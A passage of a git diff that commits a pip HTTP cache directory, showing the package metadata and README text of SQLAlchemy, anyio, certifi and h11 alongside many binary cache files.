greenlet>=1; extra == "asyncio" +Provides-Extra: mypy +Requires-Dist: mypy>=0.910; extra == "mypy" +Provides-Extra: mssql +Requires-Dist: pyodbc; extra == "mssql" +Provides-Extra: mssql-pymssql +Requires-Dist: pymssql; extra == "mssql-pymssql" +Provides-Extra: mssql-pyodbc +Requires-Dist: pyodbc; extra == "mssql-pyodbc" +Provides-Extra: mysql +Requires-Dist: mysqlclient>=1.4.0; extra == "mysql" +Provides-Extra: mysql-connector +Requires-Dist: mysql-connector-python; extra == "mysql-connector" +Provides-Extra: mariadb-connector +Requires-Dist: mariadb!=1.1.10,!=1.1.2,!=1.1.5,>=1.0.1; extra == "mariadb-connector" +Provides-Extra: oracle +Requires-Dist: cx_oracle>=8; extra == "oracle" +Provides-Extra: oracle-oracledb +Requires-Dist: oracledb>=1.0.1; extra == "oracle-oracledb" +Provides-Extra: postgresql +Requires-Dist: psycopg2>=2.7; extra == "postgresql" +Provides-Extra: postgresql-pg8000 +Requires-Dist: pg8000>=1.29.1; extra == "postgresql-pg8000" +Provides-Extra: postgresql-asyncpg +Requires-Dist: greenlet>=1; extra == "postgresql-asyncpg" +Requires-Dist: asyncpg; extra == "postgresql-asyncpg" +Provides-Extra: postgresql-psycopg2binary +Requires-Dist: psycopg2-binary; extra == "postgresql-psycopg2binary" +Provides-Extra: postgresql-psycopg2cffi +Requires-Dist: psycopg2cffi; extra == "postgresql-psycopg2cffi" +Provides-Extra: postgresql-psycopg +Requires-Dist: psycopg>=3.0.7; extra == "postgresql-psycopg" +Provides-Extra: postgresql-psycopgbinary +Requires-Dist: psycopg[binary]>=3.0.7; extra == "postgresql-psycopgbinary" +Provides-Extra: pymysql +Requires-Dist: pymysql; extra == "pymysql" +Provides-Extra: aiomysql +Requires-Dist: greenlet>=1; extra == "aiomysql" +Requires-Dist: aiomysql>=0.2.0; extra == "aiomysql" +Provides-Extra: aioodbc +Requires-Dist: greenlet>=1; extra == "aioodbc" +Requires-Dist: aioodbc; extra == "aioodbc" +Provides-Extra: asyncmy +Requires-Dist: greenlet>=1; extra == "asyncmy" +Requires-Dist: asyncmy!=0.2.4,!=0.2.6,>=0.2.3; extra == "asyncmy" +Provides-Extra: aiosqlite +Requires-Dist: greenlet>=1; extra == "aiosqlite" +Requires-Dist: aiosqlite; extra == "aiosqlite" +Requires-Dist: typing_extensions!=3.10.0.1; extra == "aiosqlite" +Provides-Extra: sqlcipher +Requires-Dist: sqlcipher3_binary; extra == "sqlcipher" +Dynamic: license-file + +SQLAlchemy +========== + +|PyPI| |Python| |Downloads| + +.. |PyPI| image:: https://img.shields.io/pypi/v/sqlalchemy + :target: https://pypi.org/project/sqlalchemy + :alt: PyPI + +.. |Python| image:: https://img.shields.io/pypi/pyversions/sqlalchemy + :target: https://pypi.org/project/sqlalchemy + :alt: PyPI - Python Version + +.. |Downloads| image:: https://static.pepy.tech/badge/sqlalchemy/month + :target: https://pepy.tech/project/sqlalchemy + :alt: PyPI - Downloads + + +The Python SQL Toolkit and Object Relational Mapper + +Introduction +------------- + +SQLAlchemy is the Python SQL toolkit and Object Relational Mapper +that gives application developers the full power and +flexibility of SQL. SQLAlchemy provides a full suite +of well known enterprise-level persistence patterns, +designed for efficient and high-performing database +access, adapted into a simple and Pythonic domain +language. + +Major SQLAlchemy features include: + +* An industrial strength ORM, built + from the core on the identity map, unit of work, + and data mapper patterns. These patterns + allow transparent persistence of objects + using a declarative configuration system. + Domain models + can be constructed and manipulated naturally, + and changes are synchronized with the + current transaction automatically. +* A relationally-oriented query system, exposing + the full range of SQL's capabilities + explicitly, including joins, subqueries, + correlation, and most everything else, + in terms of the object model. + Writing queries with the ORM uses the same + techniques of relational composition you use + when writing SQL. While you can drop into + literal SQL at any time, it's virtually never + needed. +* A comprehensive and flexible system + of eager loading for related collections and objects. + Collections are cached within a session, + and can be loaded on individual access, all + at once using joins, or by query per collection + across the full result set. +* A Core SQL construction system and DBAPI + interaction layer. The SQLAlchemy Core is + separate from the ORM and is a full database + abstraction layer in its own right, and includes + an extensible Python-based SQL expression + language, schema metadata, connection pooling, + type coercion, and custom types. +* All primary and foreign key constraints are + assumed to be composite and natural. Surrogate + integer primary keys are of course still the + norm, but SQLAlchemy never assumes or hardcodes + to this model. +* Database introspection and generation. Database + schemas can be "reflected" in one step into + Python structures representing database metadata; + those same structures can then generate + CREATE statements right back out - all within + the Core, independent of the ORM. + +SQLAlchemy's philosophy: + +* SQL databases behave less and less like object + collections the more size and performance start to + matter; object collections behave less and less like + tables and rows the more abstraction starts to matter. + SQLAlchemy aims to accommodate both of these + principles. +* An ORM doesn't need to hide the "R". A relational + database provides rich, set-based functionality + that should be fully exposed. SQLAlchemy's + ORM provides an open-ended set of patterns + that allow a developer to construct a custom + mediation layer between a domain model and + a relational schema, turning the so-called + "object relational impedance" issue into + a distant memory. +* The developer, in all cases, makes all decisions + regarding the design, structure, and naming conventions + of both the object model as well as the relational + schema. SQLAlchemy only provides the means + to automate the execution of these decisions. +* With SQLAlchemy, there's no such thing as + "the ORM generated a bad query" - you + retain full control over the structure of + queries, including how joins are organized, + how subqueries and correlation is used, what + columns are requested. Everything SQLAlchemy + does is ultimately the result of a developer-initiated + decision. +* Don't use an ORM if the problem doesn't need one. + SQLAlchemy consists of a Core and separate ORM + component. The Core offers a full SQL expression + language that allows Pythonic construction + of SQL constructs that render directly to SQL + strings for a target database, returning + result sets that are essentially enhanced DBAPI + cursors. +* Transactions should be the norm. With SQLAlchemy's + ORM, nothing goes to permanent storage until + commit() is called. SQLAlchemy encourages applications + to create a consistent means of delineating + the start and end of a series of operations. +* Never render a literal value in a SQL statement. + Bound parameters are used to the greatest degree + possible, allowing query optimizers to cache + query plans effectively and making SQL injection + attacks a non-issue. + +Documentation +------------- + +Latest documentation is at: + +https://www.sqlalchemy.org/docs/ + +Installation / Requirements +--------------------------- + +Full documentation for installation is at +`Installation `_. + +Getting Help / Development / Bug reporting +------------------------------------------ + +Please refer to the `SQLAlchemy Community Guide `_. + +Code of Conduct +--------------- + +Above all, SQLAlchemy places great emphasis on polite, thoughtful, and +constructive communication between users and developers. +Please see our current Code of Conduct at +`Code of Conduct `_. + +License +------- + +SQLAlchemy is distributed under the `MIT license +`_. + diff --git a/code-server-config/.cache/pip/http-v2/6/8/0/d/4/680d4dd80dc6a3d2df9b9478dfcc8e81e0e4f130e154a3268b98b877 b/code-server-config/.cache/pip/http-v2/6/8/0/d/4/680d4dd80dc6a3d2df9b9478dfcc8e81e0e4f130e154a3268b98b877 new file mode 100755 index 0000000..f39f9f0 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/6/8/0/d/4/680d4dd80dc6a3d2df9b9478dfcc8e81e0e4f130e154a3268b98b877 differ diff --git a/code-server-config/.cache/pip/http-v2/6/8/0/d/4/680d4dd80dc6a3d2df9b9478dfcc8e81e0e4f130e154a3268b98b877.body b/code-server-config/.cache/pip/http-v2/6/8/0/d/4/680d4dd80dc6a3d2df9b9478dfcc8e81e0e4f130e154a3268b98b877.body new file mode 100755 index 0000000..bdc3f61 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/6/8/0/d/4/680d4dd80dc6a3d2df9b9478dfcc8e81e0e4f130e154a3268b98b877.body differ diff --git a/code-server-config/.cache/pip/http-v2/6/d/d/7/f/6dd7f72563c9dcb2a786e420e686844bbc8f61eb5d9fae5d3bcb6458 b/code-server-config/.cache/pip/http-v2/6/d/d/7/f/6dd7f72563c9dcb2a786e420e686844bbc8f61eb5d9fae5d3bcb6458 new file mode 100755 index 0000000..67b1d8d Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/6/d/d/7/f/6dd7f72563c9dcb2a786e420e686844bbc8f61eb5d9fae5d3bcb6458 differ diff --git a/code-server-config/.cache/pip/http-v2/6/d/d/7/f/6dd7f72563c9dcb2a786e420e686844bbc8f61eb5d9fae5d3bcb6458.body b/code-server-config/.cache/pip/http-v2/6/d/d/7/f/6dd7f72563c9dcb2a786e420e686844bbc8f61eb5d9fae5d3bcb6458.body new file mode 100755 index 0000000..dbeb198 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/6/d/d/7/f/6dd7f72563c9dcb2a786e420e686844bbc8f61eb5d9fae5d3bcb6458.body @@ -0,0 +1,96 @@ +Metadata-Version: 2.4 +Name: anyio +Version: 4.12.1 +Summary: High-level concurrency and networking framework on top of asyncio or Trio +Author-email: Alex Grönholm +License-Expression: MIT +Project-URL: Documentation, https://anyio.readthedocs.io/en/latest/ +Project-URL: Changelog, https://anyio.readthedocs.io/en/stable/versionhistory.html +Project-URL: Source code, https://github.com/agronholm/anyio +Project-URL: Issue tracker, https://github.com/agronholm/anyio/issues +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Framework :: AnyIO +Classifier: Typing :: Typed +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Requires-Python: >=3.9 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: exceptiongroup>=1.0.2; python_version < "3.11" +Requires-Dist: idna>=2.8 +Requires-Dist: typing_extensions>=4.5; python_version < "3.13" +Provides-Extra: trio +Requires-Dist: trio>=0.32.0; python_version >= "3.10" and extra == "trio" +Requires-Dist: trio>=0.31.0; python_version < "3.10" and extra == "trio" +Dynamic: license-file + +.. image:: https://github.com/agronholm/anyio/actions/workflows/test.yml/badge.svg + :target: https://github.com/agronholm/anyio/actions/workflows/test.yml + :alt: Build Status +.. image:: https://coveralls.io/repos/github/agronholm/anyio/badge.svg?branch=master + :target: https://coveralls.io/github/agronholm/anyio?branch=master + :alt: Code Coverage +.. image:: https://readthedocs.org/projects/anyio/badge/?version=latest + :target: https://anyio.readthedocs.io/en/latest/?badge=latest + :alt: Documentation +.. image:: https://badges.gitter.im/gitterHQ/gitter.svg + :target: https://gitter.im/python-trio/AnyIO + :alt: Gitter chat + +AnyIO is an asynchronous networking and concurrency library that works on top of either asyncio_ or +Trio_. It implements Trio-like `structured concurrency`_ (SC) on top of asyncio and works in harmony +with the native SC of Trio itself. + +Applications and libraries written against AnyIO's API will run unmodified on either asyncio_ or +Trio_. AnyIO can also be adopted into a library or application incrementally – bit by bit, no full +refactoring necessary. It will blend in with the native libraries of your chosen backend. + +To find out why you might want to use AnyIO's APIs instead of asyncio's, you can read about it +`here `_. + +Documentation +------------- + +View full documentation at: https://anyio.readthedocs.io/ + +Features +-------- + +AnyIO offers the following functionality: + +* Task groups (nurseries_ in trio terminology) +* High-level networking (TCP, UDP and UNIX sockets) + + * `Happy eyeballs`_ algorithm for TCP connections (more robust than that of asyncio on Python + 3.8) + * async/await style UDP sockets (unlike asyncio where you still have to use Transports and + Protocols) + +* A versatile API for byte streams and object streams +* Inter-task synchronization and communication (locks, conditions, events, semaphores, object + streams) +* Worker threads +* Subprocesses +* Subinterpreter support for code parallelization (on Python 3.13 and later) +* Asynchronous file I/O (using worker threads) +* Signal handling +* Asynchronous version of the functools_ module + +AnyIO also comes with its own pytest_ plugin which also supports asynchronous fixtures. +It even works with the popular Hypothesis_ library. + +.. _asyncio: https://docs.python.org/3/library/asyncio.html +.. _Trio: https://github.com/python-trio/trio +.. _structured concurrency: https://en.wikipedia.org/wiki/Structured_concurrency +.. _nurseries: https://trio.readthedocs.io/en/stable/reference-core.html#nurseries-and-spawning +.. _Happy eyeballs: https://en.wikipedia.org/wiki/Happy_Eyeballs +.. _pytest: https://docs.pytest.org/en/latest/ +.. _functools: https://docs.python.org/3/library/functools.html +.. _Hypothesis: https://hypothesis.works/ diff --git a/code-server-config/.cache/pip/http-v2/6/f/7/1/9/6f7191662785a6314e6bade3b897cbef6bec19bb8e1ed58745e9e726 b/code-server-config/.cache/pip/http-v2/6/f/7/1/9/6f7191662785a6314e6bade3b897cbef6bec19bb8e1ed58745e9e726 new file mode 100755 index 0000000..2b34989 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/6/f/7/1/9/6f7191662785a6314e6bade3b897cbef6bec19bb8e1ed58745e9e726 differ diff --git a/code-server-config/.cache/pip/http-v2/6/f/7/1/9/6f7191662785a6314e6bade3b897cbef6bec19bb8e1ed58745e9e726.body b/code-server-config/.cache/pip/http-v2/6/f/7/1/9/6f7191662785a6314e6bade3b897cbef6bec19bb8e1ed58745e9e726.body new file mode 100755 index 0000000..d1bc526 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/6/f/7/1/9/6f7191662785a6314e6bade3b897cbef6bec19bb8e1ed58745e9e726.body @@ -0,0 +1,78 @@ +Metadata-Version: 2.4 +Name: certifi +Version: 2026.1.4 +Summary: Python package for providing Mozilla's CA Bundle. +Home-page: https://github.com/certifi/python-certifi +Author: Kenneth Reitz +Author-email: me@kennethreitz.com +License: MPL-2.0 +Project-URL: Source, https://github.com/certifi/python-certifi +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0) +Classifier: Natural Language :: English +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Programming Language :: Python :: 3.13 +Classifier: Programming Language :: Python :: 3.14 +Requires-Python: >=3.7 +License-File: LICENSE +Dynamic: author +Dynamic: author-email +Dynamic: classifier +Dynamic: description +Dynamic: home-page +Dynamic: license +Dynamic: license-file +Dynamic: project-url +Dynamic: requires-python +Dynamic: summary + +Certifi: Python SSL Certificates +================================ + +Certifi provides Mozilla's carefully curated collection of Root Certificates for +validating the trustworthiness of SSL certificates while verifying the identity +of TLS hosts. It has been extracted from the `Requests`_ project. + +Installation +------------ + +``certifi`` is available on PyPI. Simply install it with ``pip``:: + + $ pip install certifi + +Usage +----- + +To reference the installed certificate authority (CA) bundle, you can use the +built-in function:: + + >>> import certifi + + >>> certifi.where() + '/usr/local/lib/python3.7/site-packages/certifi/cacert.pem' + +Or from the command line:: + + $ python -m certifi + /usr/local/lib/python3.7/site-packages/certifi/cacert.pem + +Enjoy! + +.. _`Requests`: https://requests.readthedocs.io/en/master/ + +Addition/Removal of Certificates +-------------------------------- + +Certifi does not support any addition/removal or other modification of the +CA trust store content. This project is intended to provide a reliable and +highly portable root of trust to python deployments. Look to upstream projects +for methods to use alternate trust. diff --git a/code-server-config/.cache/pip/http-v2/7/5/2/4/8/75248c373d50f62ae989db97e5f74613b5b513b024376712f93d486a b/code-server-config/.cache/pip/http-v2/7/5/2/4/8/75248c373d50f62ae989db97e5f74613b5b513b024376712f93d486a new file mode 100755 index 0000000..fdd35cb Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/7/5/2/4/8/75248c373d50f62ae989db97e5f74613b5b513b024376712f93d486a differ diff --git a/code-server-config/.cache/pip/http-v2/7/5/2/4/8/75248c373d50f62ae989db97e5f74613b5b513b024376712f93d486a.body b/code-server-config/.cache/pip/http-v2/7/5/2/4/8/75248c373d50f62ae989db97e5f74613b5b513b024376712f93d486a.body new file mode 100755 index 0000000..c4c3373 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/7/5/2/4/8/75248c373d50f62ae989db97e5f74613b5b513b024376712f93d486a.body differ diff --git a/code-server-config/.cache/pip/http-v2/7/b/f/d/a/7bfda9f6c7fc68d2025bf39812313b43025996be0f6256ea8fc36f0c b/code-server-config/.cache/pip/http-v2/7/b/f/d/a/7bfda9f6c7fc68d2025bf39812313b43025996be0f6256ea8fc36f0c new file mode 100755 index 0000000..04409a0 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/7/b/f/d/a/7bfda9f6c7fc68d2025bf39812313b43025996be0f6256ea8fc36f0c differ diff --git a/code-server-config/.cache/pip/http-v2/7/b/f/d/a/7bfda9f6c7fc68d2025bf39812313b43025996be0f6256ea8fc36f0c.body b/code-server-config/.cache/pip/http-v2/7/b/f/d/a/7bfda9f6c7fc68d2025bf39812313b43025996be0f6256ea8fc36f0c.body new file mode 100755 index 0000000..d928a48 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/7/b/f/d/a/7bfda9f6c7fc68d2025bf39812313b43025996be0f6256ea8fc36f0c.body differ diff --git a/code-server-config/.cache/pip/http-v2/8/0/e/9/4/80e9405db26f4e2bbc6e0b3184aa09055d40bf4a94f7b4a8c5bc70b2 b/code-server-config/.cache/pip/http-v2/8/0/e/9/4/80e9405db26f4e2bbc6e0b3184aa09055d40bf4a94f7b4a8c5bc70b2 new file mode 100755 index 0000000..073f55d Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/0/e/9/4/80e9405db26f4e2bbc6e0b3184aa09055d40bf4a94f7b4a8c5bc70b2 differ diff --git a/code-server-config/.cache/pip/http-v2/8/0/e/9/4/80e9405db26f4e2bbc6e0b3184aa09055d40bf4a94f7b4a8c5bc70b2.body b/code-server-config/.cache/pip/http-v2/8/0/e/9/4/80e9405db26f4e2bbc6e0b3184aa09055d40bf4a94f7b4a8c5bc70b2.body new file mode 100755 index 0000000..e461253 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/0/e/9/4/80e9405db26f4e2bbc6e0b3184aa09055d40bf4a94f7b4a8c5bc70b2.body differ diff --git a/code-server-config/.cache/pip/http-v2/8/8/f/7/d/88f7d71f2d1361f8fb38230bb8ae05bdb624c08a2414e1c535731370 b/code-server-config/.cache/pip/http-v2/8/8/f/7/d/88f7d71f2d1361f8fb38230bb8ae05bdb624c08a2414e1c535731370 new file mode 100755 index 0000000..fa359f4 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/8/f/7/d/88f7d71f2d1361f8fb38230bb8ae05bdb624c08a2414e1c535731370 differ diff --git a/code-server-config/.cache/pip/http-v2/8/8/f/7/d/88f7d71f2d1361f8fb38230bb8ae05bdb624c08a2414e1c535731370.body b/code-server-config/.cache/pip/http-v2/8/8/f/7/d/88f7d71f2d1361f8fb38230bb8ae05bdb624c08a2414e1c535731370.body new file mode 100755 index 0000000..db6c8e4 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/8/f/7/d/88f7d71f2d1361f8fb38230bb8ae05bdb624c08a2414e1c535731370.body differ diff --git a/code-server-config/.cache/pip/http-v2/8/b/2/4/2/8b24226e2da88df4abeee0d8ca6bce79b19ca2bcd5f94b543939c66c b/code-server-config/.cache/pip/http-v2/8/b/2/4/2/8b24226e2da88df4abeee0d8ca6bce79b19ca2bcd5f94b543939c66c new file mode 100755 index 0000000..b4fe76e Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/b/2/4/2/8b24226e2da88df4abeee0d8ca6bce79b19ca2bcd5f94b543939c66c differ diff --git a/code-server-config/.cache/pip/http-v2/8/b/2/4/2/8b24226e2da88df4abeee0d8ca6bce79b19ca2bcd5f94b543939c66c.body b/code-server-config/.cache/pip/http-v2/8/b/2/4/2/8b24226e2da88df4abeee0d8ca6bce79b19ca2bcd5f94b543939c66c.body new file mode 100755 index 0000000..61a925a Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/b/2/4/2/8b24226e2da88df4abeee0d8ca6bce79b19ca2bcd5f94b543939c66c.body differ diff --git a/code-server-config/.cache/pip/http-v2/8/e/c/f/f/8ecffcc7a3e38674c0b5a8addfcc2c1a5184431d21c3b57c81cc4a6d b/code-server-config/.cache/pip/http-v2/8/e/c/f/f/8ecffcc7a3e38674c0b5a8addfcc2c1a5184431d21c3b57c81cc4a6d new file mode 100755 index 0000000..e035425 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/e/c/f/f/8ecffcc7a3e38674c0b5a8addfcc2c1a5184431d21c3b57c81cc4a6d differ diff --git a/code-server-config/.cache/pip/http-v2/8/e/c/f/f/8ecffcc7a3e38674c0b5a8addfcc2c1a5184431d21c3b57c81cc4a6d.body b/code-server-config/.cache/pip/http-v2/8/e/c/f/f/8ecffcc7a3e38674c0b5a8addfcc2c1a5184431d21c3b57c81cc4a6d.body new file mode 100755 index 0000000..8a2f639 --- /dev/null +++ b/code-server-config/.cache/pip/http-v2/8/e/c/f/f/8ecffcc7a3e38674c0b5a8addfcc2c1a5184431d21c3b57c81cc4a6d.body @@ -0,0 +1,202 @@ +Metadata-Version: 2.4 +Name: h11 +Version: 0.16.0 +Summary: A pure-Python, bring-your-own-I/O implementation of HTTP/1.1 +Home-page: https://github.com/python-hyper/h11 +Author: Nathaniel J. Smith +Author-email: njs@pobox.com +License: MIT +Classifier: Development Status :: 3 - Alpha +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3.12 +Classifier: Topic :: Internet :: WWW/HTTP +Classifier: Topic :: System :: Networking +Requires-Python: >=3.8 +License-File: LICENSE.txt +Dynamic: author +Dynamic: author-email +Dynamic: classifier +Dynamic: description +Dynamic: home-page +Dynamic: license +Dynamic: license-file +Dynamic: requires-python +Dynamic: summary + +h11 +=== + +.. image:: https://travis-ci.org/python-hyper/h11.svg?branch=master + :target: https://travis-ci.org/python-hyper/h11 + :alt: Automated test status + +.. image:: https://codecov.io/gh/python-hyper/h11/branch/master/graph/badge.svg + :target: https://codecov.io/gh/python-hyper/h11 + :alt: Test coverage + +.. image:: https://readthedocs.org/projects/h11/badge/?version=latest + :target: http://h11.readthedocs.io/en/latest/?badge=latest + :alt: Documentation Status + +This is a little HTTP/1.1 library written from scratch in Python, +heavily inspired by `hyper-h2 `_. + +It's a "bring-your-own-I/O" library; h11 contains no IO code +whatsoever. This means you can hook h11 up to your favorite network +API, and that could be anything you want: synchronous, threaded, +asynchronous, or your own implementation of `RFC 6214 +`_ -- h11 won't judge you. +(Compare this to the current state of the art, where every time a `new +network API `_ comes along then someone +gets to start over reimplementing the entire HTTP protocol from +scratch.) Cory Benfield made an `excellent blog post describing the +benefits of this approach +`_, or if you like video +then here's his `PyCon 2016 talk on the same theme +`_. + +This also means that h11 is not immediately useful out of the box: +it's a toolkit for building programs that speak HTTP, not something +that could directly replace ``requests`` or ``twisted.web`` or +whatever. But h11 makes it much easier to implement something like +``requests`` or ``twisted.web``. + +At a high level, working with h11 goes like this: + +1) First, create an ``h11.Connection`` object to track the state of a + single HTTP/1.1 connection. + +2) When you read data off the network, pass it to + ``conn.receive_data(...)``; you'll get back a list of objects + representing high-level HTTP "events". + +3) When you want to send a high-level HTTP event, create the + corresponding "event" object and pass it to ``conn.send(...)``; + this will give you back some bytes that you can then push out + through the network. + +For example, a client might instantiate and then send a +``h11.Request`` object, then zero or more ``h11.Data`` objects for the +request body (e.g., if this is a POST), and then a +``h11.EndOfMessage`` to indicate the end of the message. Then the +server would then send back a ``h11.Response``, some ``h11.Data``, and +its own ``h11.EndOfMessage``. If either side violates the protocol, +you'll get a ``h11.ProtocolError`` exception. + +h11 is suitable for implementing both servers and clients, and has a +pleasantly symmetric API: the events you send as a client are exactly +the ones that you receive as a server and vice-versa. + +`Here's an example of a tiny HTTP client +`_ + +It also has `a fine manual `_. + +FAQ +--- + +*Whyyyyy?* + +I wanted to play with HTTP in `Curio +`__ and `Trio +`__, which at the time didn't have any +HTTP libraries. So I thought, no big deal, Python has, like, a dozen +different implementations of HTTP, surely I can find one that's +reusable. I didn't find one, but I did find Cory's call-to-arms +blog-post. So I figured, well, fine, if I have to implement HTTP from +scratch, at least I can make sure no-one *else* has to ever again. + +*Should I use it?* + +Maybe. You should be aware that it's a very young project. But, it's +feature complete and has an exhaustive test-suite and complete docs, +so the next step is for people to try using it and see how it goes +:-). If you do then please let us know -- if nothing else we'll want +to talk to you before making any incompatible changes! + +*What are the features/limitations?* + +Roughly speaking, it's trying to be a robust, complete, and non-hacky +implementation of the first "chapter" of the HTTP/1.1 spec: `RFC 7230: +HTTP/1.1 Message Syntax and Routing +`_. That is, it mostly focuses on +implementing HTTP at the level of taking bytes on and off the wire, +and the headers related to that, and tries to be anal about spec +conformance. It doesn't know about higher-level concerns like URL +routing, conditional GETs, cross-origin cookie policies, or content +negotiation. But it does know how to take care of framing, +cross-version differences in keep-alive handling, and the "obsolete +line folding" rule, so you can focus your energies on the hard / +interesting parts for your application, and it tries to support the +full specification in the sense that any useful HTTP/1.1 conformant +application should be able to use h11. + +It's pure Python, and has no dependencies outside of the standard +library. + +It has a test suite with 100.0% coverage for both statements and +branches. + +Currently it supports Python 3 (testing on 3.8-3.12) and PyPy 3. +The last Python 2-compatible version was h11 0.11.x. +(Originally it had a Cython wrapper for `http-parser +`_ and a beautiful nested state +machine implemented with ``yield from`` to postprocess the output. But +I had to take these out -- the new *parser* needs fewer lines-of-code +than the old *parser wrapper*, is written in pure Python, uses no +exotic language syntax, and has more features. It's sad, really; that +old state machine was really slick. I just need a few sentences here +to mourn that.) + +I don't know how fast it is. I haven't benchmarked or profiled it yet, +so it's probably got a few pointless hot spots, and I've been trying +to err on the side of simplicity and robustness instead of +micro-optimization. But at the architectural level I tried hard to +avoid fundamentally bad decisions, e.g., I believe that all the +parsing algorithms remain linear-time even in the face of pathological +input like slowloris, and there are no byte-by-byte loops. (I also +believe that it maintains bounded memory usage in the face of +arbitrary/pathological input.) + +The whole library is ~800 lines-of-code. You can read and understand +the whole thing in less than an hour. Most of the energy invested in +this so far has been spent on trying to keep things simple by +minimizing special-cases and ad hoc state manipulation; even though it +is now quite small and simple, I'm still annoyed that I haven't +figured out how to make it even smaller and simpler. (Unfortunately, +HTTP does not lend itself to simplicity.) + +The API is ~feature complete and I don't expect the general outlines +to change much, but you can't judge an API's ergonomics until you +actually document and use it, so I'd expect some changes in the +details. + +*How do I try it?* + +.. code-block:: sh + + $ pip install h11 + $ git clone git@github.com:python-hyper/h11 + $ cd h11/examples + $ python basic-client.py + +and go from there. + +*License?* + +MIT + +*Code of conduct?* + +Contributors are requested to follow our `code of conduct +`_ in +all project spaces. diff --git a/code-server-config/.cache/pip/http-v2/8/f/0/a/d/8f0ad583652318494c12da41e4d30ff6225ec73d448a0754a0a7e898 b/code-server-config/.cache/pip/http-v2/8/f/0/a/d/8f0ad583652318494c12da41e4d30ff6225ec73d448a0754a0a7e898 new file mode 100755 index 0000000..4734feb Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/f/0/a/d/8f0ad583652318494c12da41e4d30ff6225ec73d448a0754a0a7e898 differ diff --git a/code-server-config/.cache/pip/http-v2/8/f/0/a/d/8f0ad583652318494c12da41e4d30ff6225ec73d448a0754a0a7e898.body b/code-server-config/.cache/pip/http-v2/8/f/0/a/d/8f0ad583652318494c12da41e4d30ff6225ec73d448a0754a0a7e898.body new file mode 100755 index 0000000..8466935 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/8/f/0/a/d/8f0ad583652318494c12da41e4d30ff6225ec73d448a0754a0a7e898.body differ diff --git a/code-server-config/.cache/pip/http-v2/9/1/1/8/d/9118d2865fad57ca510f5444caa60cda483fe032c97b2b94ff631e21 b/code-server-config/.cache/pip/http-v2/9/1/1/8/d/9118d2865fad57ca510f5444caa60cda483fe032c97b2b94ff631e21 new file mode 100755 index 0000000..2f71a4b Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/9/1/1/8/d/9118d2865fad57ca510f5444caa60cda483fe032c97b2b94ff631e21 differ diff --git a/code-server-config/.cache/pip/http-v2/9/1/1/8/d/9118d2865fad57ca510f5444caa60cda483fe032c97b2b94ff631e21.body b/code-server-config/.cache/pip/http-v2/9/1/1/8/d/9118d2865fad57ca510f5444caa60cda483fe032c97b2b94ff631e21.body new file mode 100755 index 0000000..c39c13b Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/9/1/1/8/d/9118d2865fad57ca510f5444caa60cda483fe032c97b2b94ff631e21.body differ diff --git a/code-server-config/.cache/pip/http-v2/9/1/a/c/4/91ac4141ee513b48d6e2106b8504eedf08543a9ac70e664c84a86c9b b/code-server-config/.cache/pip/http-v2/9/1/a/c/4/91ac4141ee513b48d6e2106b8504eedf08543a9ac70e664c84a86c9b new file mode 100755 index 0000000..d1ba7db Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/9/1/a/c/4/91ac4141ee513b48d6e2106b8504eedf08543a9ac70e664c84a86c9b differ diff --git a/code-server-config/.cache/pip/http-v2/9/1/a/c/4/91ac4141ee513b48d6e2106b8504eedf08543a9ac70e664c84a86c9b.body b/code-server-config/.cache/pip/http-v2/9/1/a/c/4/91ac4141ee513b48d6e2106b8504eedf08543a9ac70e664c84a86c9b.body new file mode 100755 index 0000000..7748a04 Binary files /dev/null and b/code-server-config/.cache/pip/http-v2/9/1/a/c/4/91ac4141ee513b48d6e2106b8504eedf08543a9ac70e664c84a86c9b.body differ diff --git a/code-server-config/.cache/pip/http-v2/9/3/6/e/f/936ef88052230050c9d8c803e64ef58ee62e7c4e4f61da74ba2ef008 b/code-server-config/.cache/pip/http-v2/9/3/6/e/f/936ef88052230050c9d8c803e64ef58ee62e7c4e4f61da74ba2ef008 new file mode 100755 index 0000000..3f621b4 Binary files /dev/null and 